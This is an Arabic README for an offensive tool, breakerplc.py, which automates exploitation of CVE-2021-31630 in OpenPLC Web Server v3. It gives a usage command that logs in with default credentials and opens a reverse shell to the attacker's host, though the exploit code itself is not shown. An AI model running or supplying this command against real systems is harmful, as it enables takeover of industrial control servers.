
هذه أتمتة لاستغلال cve-2021-31630
هذا السكربت يستغل تلقائيًا ثغرة في خادم OpenPLC Web Server v3
ستتمكن من إنشاء قشرة عكسية (Reverse Shell) تلقائية مع الخادم دون الحاجة إلى استخدام تقنيات يدوية.
تفاصيل CVE-2021-31630 تسمح حقن الأوامر في Open PLC Webserver v3 للمهاجمين عن بُعد بتنفيذ تعليمات برمجية عشوائية عبر مكوّن "Hardware Layer Code Box" على صفحة "/hardware" في التطبيق.
تم تخصيص السكربت بحيث بعد إكمال تسجيل السكربت في OpenPLC، يقوم بإنشاء قشرة الجهاز في نفس الطرفية.
استخدم الأمر أدناه (نوصي بإنشاء بيئة افتراضية Python لتثبيت التبعيات) # ومع ذلك، يجب تنفيذ سكربت breakerplc.py خارج البيئة الافتراضية.
sudo apt update
pip3 install requests
كيفية الاستخدام؟ يمكنك استخدام سطر الأوامر هذا (بالأسفل).
python breakerplc.py -lh <your local ip> -lp 4444 <http://machine ip:8080> -u openplc -p openplc
usage: python breakerplc.py [-h] [-u U] [-p P] [-t T] -lh LH -lp LP url
positional arguments:
url Target URL with http(s)://
options:
-h, --help show this help message and exit
-u U Username
-p P Password
-t T Request Timeout, increase if server is slow
-lh LH LHOST
-lp LP LPORT

مهم
بعد الاتصال، تحتاج إلى كتابة "whoami" أو "ls" لكسر سطر الكود وإعادة القشرة.
